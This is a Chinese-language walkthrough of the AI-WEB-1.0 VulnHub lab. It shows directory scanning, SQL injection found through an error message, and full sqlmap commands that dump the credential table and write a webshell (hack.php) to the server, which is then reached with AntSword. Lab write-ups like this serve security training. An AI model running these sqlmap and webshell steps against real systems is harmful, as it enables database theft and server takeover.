一、环境准备
1.AI-WEB-1.0靶机
https://www.vulnhub.com/entry/ai-web-1,353/
压缩包解压后,直接双击打开。(注:将靶机连接方式改为NAT模式)
2.kali攻击机
3.蚁剑webshell工具
https://github.com/AntSwordProject/
二、网站查询
1.御剑2014查IP (查询的IP为虚拟网卡vMnet8的IP)
访问网站
2.用扫描目录的工具(御剑无字典大小限制版)扫描当前网站的目录
分别访问roborts.txt,index.html
我们发现robots.txt中有标明目录,我们再去尝试一一访问。
3.继续扫http://192.168.61.129/se3reTdir777/与http://192.168.61.129/m3diNf0下目录。
得到http://192.168.61.129/se3reTdir777/index.php与http://192.168.61.129/m3diNf0/info.php
访问http://192.168.61.129/m3diNf0/info.php
在http://192.168.61.129/se3reTdir777中发现提交框,开始尝试注入。
三、注入尝试
1.尝试SQL注入
判断是否有SQL注入
在输入框输入
1' //有报错信息
1 //有结果
2.抓包设置注入点,然后用工具sqlmap去注入
3.查库
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --batch --current-db
库名:aiweb1
4.查表
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --batch -D aiweb1 --tables
表名:user、systemUser
5.查user数据
python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump
得到账号与密码,但是没有登录的地方也没有文件上传的地方。
四、写入木马
由访问http://192.168.61.129/m3diNf0/info.php得文件所处路径。
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php
写入成功,使用蚁剑连接。
连接成功,通关完成。